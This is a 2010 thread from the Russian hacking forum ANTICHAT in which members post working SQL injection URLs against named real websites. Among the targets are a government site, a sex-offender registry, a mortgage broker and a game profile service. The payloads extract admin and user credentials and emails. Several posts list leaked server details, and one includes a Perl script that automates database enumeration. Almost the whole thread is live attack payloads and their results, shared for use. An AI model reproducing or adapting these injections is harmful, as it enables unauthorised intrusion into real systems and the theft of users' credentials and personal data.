ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.05.2010, 01:22
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://www.ahfeixi.gov.cn/include/news_view.php?ty=1&ID=-11184+union+select+1,2,concat(user(),char(58),vers ion(),char(58),database()),4,5,6,7,8,9,10,11,12,13 ,14--
PR-5
|
|
|
28.05.2010, 15:25
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+concat_ws(':',version(),database(),user(),@@vers ion_compile_os,@@tmpdir,@@datadir)),floor(rand(0)* 2)))--+
5.0.77-community-nt:mostwanted:globaluname@localhost:Win32:C:\WI...
>400 БД
> 40 таблиц tbladminuser
http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+concat_ws(':',username,password)+FROM+seodata.ad min+limit+0,1),floor(rand(0)*2)))--+
http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+concat_ws(':',loginname,pass,admin)+FROM+resumex .users+limit+0,1),floor(rand(0)*2)))--+
в подарочек:
PHP код:
#!/usr/bin/perl -w
# target
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
#my $proxy="http://xxx.xxx.xxx.xxx:port";
#$ua->proxy(['http','https'],$proxy);
my $i=0;
while(1)
{
my $req = HTTP::Request->new(GET => "http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+SCHEMA_NAME+FROM+information_schema.SCHEMATA+limit+$i,1),floor(rand(0)*2)))--+");
my $res = $ua->request($req);
if ($res->as_string =~ /Duplicate entry(.+)for/)
{
open(FILE,'>>results.txt');
print "print $i: $1\n";
print FILE "$1\n";
close(FILE);
$i++;
}
else {last;}
}
Последний раз редактировалось Strilo4ka; 28.05.2010 в 15:38..
|
|
|
|
28.05.2010, 16:10
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
www.cam-systems.ca/industry-news.php?id=99999999+union+select+1,concat(0x3a,0x3a,email,0x3 a,0x3a,pass,0x3a,0x3a),3,4,5,6+from+tbl_account+li mit+1,1%23
www.redebemreceber.com.br/news.php?id=999999+union+select+1,2,3,4,concat(0x3a,usuario,0x 3a,senha,0x3a),6,7+from+usuarios%23
www.shereno.co.za/news.php?id=9999+union+select+1,concat(0x3a,login,0x3a,passwd, 0x3a),3+from+cmsusers%23
|
|
|
|
28.05.2010, 17:16
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379
Репутация:
1069
|
|
Сайт: http://www.mortgagebrokers.com
ТИЦ: 0
PR: 4
Код:
http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,users_name,0x3a,password,0x3a,email),6,7,8+from+lime_users--+
http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,now(),group_concat(0x0b,email),6,7,8+from+filogix_brokers--+
http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,now(),group_concat(0x0b,loginname,0x3a,password,0x3a,email),6,7,8+from+mb_minvis_user--+
http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,now(),group_concat(0x0b,lastname,0x3a,password,0x3a,email),6,7,8+from+mb_realtor--+
http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,now(),group_concat(0x0b,lastname,0x3a,password,0x3a,email),6,7,8+from+pm_users--+
version - 5.0.27
user - alexhad@localhost
database - alexhad
os - redhat-linux-gnu
==========================================
Сайт: http://www.thelodge-scotland.com
ТИЦ: 0
PR: 3
Код:
http://www.thelodge-scotland.com/cms.php?id=32+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,5--+
version - 4.1.22-standard
user - thelodge_lodge@localhost
database - thelodge_test
os - pc-linux-gnu
==========================================
Сайт: http://www.doctorrbrand.com
ТИЦ: 0
PR: 0
Код:
http://www.doctorrbrand.com/cms.php?id=-8+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,username,0x3a,password),4,5+from+admininfo--+
http://www.doctorrbrand.com/cms.php?id=-8+union+select+1,now(),group_concat(0x0b,user_name,0x3a,password,0x3a,email),4,5+from+user--+
http://www.doctorrbrand.com/cms.php?id=-8+union+select+1,now(),group_concat(0x0b,email),4,5+from+newsletter_subscribers--+
version - 5.0.37-log
user - mydoctor@localhost
database - dronline
os - portbld-freebsd6.1
|
|
|
|
28.05.2010, 18:50
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
wow дрочерам посвящается
http://profile.wow.com/includes/friendRequest.php?userId=527/**/union/**/select/**/1,2+from+mysql.user/*
or
http://profile.wow.com/guild/?id=0+union+select+1+from+user/*
or
http://profile.wow.com/includes/friendRequest.php?userId=99+and+1=if((select+subst ring(version(),1,1)<=5),1,(select+1+union+select+2 ))
blind-sqlinj
user(): wow_rw@305.1
database(): wow
version(): 5.0.41-log
PHP код:
table:users
---> column : imageId
---> column : nameUrl
---> column : bio
---> column : beta
---> column : buddyIcon
---> column : sns
---> column : banned
---> column : admin
---> column : date
---> column : name
---> column : private
---> column : email
---> column : newUser
---> column : guid
---> column : betaSigned
---> column : userId
---> column : entryDate
---> column : status
---> column : facebookId
Спасибо Pashkela и Jokester! 
Последний раз редактировалось $n@ke; 28.05.2010 в 18:53..
|
|
|
|
28.05.2010, 22:12
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
вот и собственно сайт
http://www.baytnet.com/dynamic.php?id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,aes_decrypt(aes_encrypt(concat(Email,0x3a,Pas sword),1),1),4+from+/*!baytnet_baytdb.member*/
user() : baytnet_baytuse@localhost
version() : 5.0.90-community
database() : baytnet_baytdb
datadir : /var/lib/mysql/
OS : pc-linux-gnu (@@VeRsIon_cOmPile_Os )
PR-3 |
|
|
|
29.05.2010, 09:10
|
|
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126
Репутация:
55
|
|
user:version:database = roaauser@localhost:5.0.45-log:roaa
PR 6
403 http://www.romarch.org/admin/ 
Код:
http://www.romarch.org/pags.php?id=-18+union+select+1,group_concat(user,0x3a,pass),3,4+FROM+users--
+
Коммунисты
Код:
http://magkprf.ru/news.php?id=-615+union+select+1,2,3,4,group_concat(COLUMN_NAME),6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7573657273--
Последний раз редактировалось qq6ka; 29.05.2010 в 10:03..
|
|
|
|
29.05.2010, 11:13
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684
Репутация:
136
|
|
http://www.clubmayak.ru/press.php?code=-4+%75%6e%69%6f%6e+%73%65%6c%65%63%74+concat_ws(@@v ersion,user(),database(),@@version_compile_os),2,3 ,4,5,6+--
|
|
|
|
29.05.2010, 13:27
|
|
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126
Репутация:
55
|
|
е-магазин
http://www.fashionbootsite.com/products.php?id=-2+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9+FROM+admininfo--
|
|
|
|
29.05.2010, 14:23
|
|
Новичок
Регистрация: 01.01.2009
Сообщений: 27
Провел на форуме:
125085
Репутация:
31
|
|
Код:
http://www.readplus.com.au/blog_detail.php?id=-1+union+select+1,concat_ws(0x3a3a3a,userid,password,email,superuser),3,4,5,6,7,8,9,10+from+readplus_login--
PR 5 |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
